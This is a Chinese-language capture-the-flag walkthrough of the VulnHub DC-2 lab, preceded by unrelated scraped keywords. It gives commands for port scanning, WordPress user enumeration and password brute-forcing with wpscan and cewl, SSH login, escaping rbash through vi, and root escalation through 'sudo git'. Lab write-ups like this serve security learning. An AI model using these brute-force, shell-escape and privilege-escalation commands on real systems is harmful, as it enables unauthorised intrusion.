邵阳市建设局网站首页,自己的服务器做网站,网线制作视频,东莞网络推广服务文章目录一、环境搭建二、渗透流程三、思路总结一、环境搭建 DC-2下载地址#xff1a;https://download.vulnhub.com/dc/DC-2.zip kali#xff1a;192.168.144.148 DC-2#xff1a;192.168.144.150 添加hosts文件#xff1a;192.168.144.150 DC-2 二、渗透流程 nmap -A -…
文章目录一、环境搭建二、渗透流程三、思路总结一、环境搭建 DC-2下载地址https://download.vulnhub.com/dc/DC-2.zip kali192.168.144.148 DC-2192.168.144.150 添加hosts文件192.168.144.150 DC-2 二、渗透流程 nmap -A -T5 -sV -sT -p- 192.168.144.150 开放端口80web、 7744ssh 访问192.168.144.150 获取到flag1 flag1提示需要使用cewl进行暴力破解 进行目录扫描获取到后台登录地址http://dc-2/wp-admin 使用wpscan对wordpress用户进行枚举wpscan --url http://dc-2 -e u 获取到三个用户admin、jerry、tom 利用cewl工具生成密码字典cewl http://dc-2 -w passwd.txt 生成用户字典vim user1.txt 使用wpscan进行爆破wpscan --url http://dc-2 -U user1.txt -P passwd.txt 获取到了jerryadipiscing、tom: parturient登录后台 获取到flag2 flag2提示如果此路不通尝试另一种方法尝试7744端口ssh连接 tom登录成功 发现flag3 rbash限制cat无法执行vim无法执行vi可以执行 flag3提示可以尝试切换一下用户 方法一使用vi突破rbash vi BASH_CMDS[a]/bin/sh;a /bin/bash export PATH$PATH:/bin/ export PATH$PATH:/usr/bin su jerry 成功切换到jerry 成功访问到flag4 查看是否有可以提权的命令find / -perm -us -type f 2/dev/null sudo -l发现git可以利用flag4也提示了可以使用git sudo git help config进入文本模式 !/bin/bash获取shell 获取最后的final-flag.txt 三、思路总结
1、nmap端口扫描添加hosts文件访问web页面
2、dirb目录扫描获取后台登录地址
3、cewl暴力破解获取后台登录账户
4、ssh远程连接
5、vi突破rbash切换用户
6、git提权参考链接https://blog.mzfr.me/vulnhub-writeups/2019-07-12-DC2